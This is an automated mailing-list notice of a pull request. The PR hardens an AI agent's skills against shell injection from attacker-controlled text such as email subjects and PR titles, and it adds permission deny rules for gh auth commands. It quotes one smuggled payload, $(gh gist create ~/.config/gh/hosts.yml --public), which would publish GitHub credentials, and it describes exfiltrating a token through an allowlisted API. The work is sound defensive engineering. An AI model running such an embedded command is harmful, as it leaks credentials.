andrew opened a new pull request, #88: URL: https://github.com/apache/airflow-steward/pull/88
Follow-up to #81 and #84. The `printf '%s' "<x>"` recipe that #81 introduced for getting attacker-controlled strings (email subjects, PR titles, scanner-finding titles) into tempfiles before passing to `gh api -F field=@file` still routes the string through a double-quoted shell argument. The shell expands `$(...)`, backticks and `$VAR` in `"<x>"` before `printf` ever runs, so a subject like `RCE in $(gh gist create ~/.config/gh/hosts.yml --public)` still executes. The old single-quoted form was vulnerable to `'` breakout; the new form is vulnerable to `$` / backtick / `"` breakout. #84 then encoded the same recipe as Pattern 1 and Pattern 3 of `write-skill/security-checklist.md`, so every future skill scaffolded through that flow would inherit it. This replaces the recipe with an instruction to use the Write tool (not Bash) to put the attacker bytes on disk. The Write tool takes content as a literal parameter with no shell tokenisation; `gh api -F field=@file` then reads it verbatim. Applied at all six recipe sites across the three import skills, and at Patterns 1 and 3 of the write-skill checklist. Each site now also carries an explicit "never `printf '%s' "<x>"`" warning so the old form doesn't creep back. Also in `.claude/settings.json`: - `gh auth token` and `gh auth refresh` added to `permissions.deny`. `gh auth token` prints the GitHub token to stdout with no prompt, so any successful injection that reaches Bash can exfil it via the already-allowlisted `api.github.com`. - `gh workflow run *` added to `permissions.ask`. - Flag-first variants `gh api --method *` and `gh api --input *` added alongside the existing `gh api * --method *` / `gh api * --input *` so argument ordering can't sidestep the pattern. Not in this PR: fencing the verbatim bodies in `import-from-pr` / `import-from-md` (finding 5 follow-up), and committing the audit gist into `docs/security/`. Both are smaller and can land separately. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
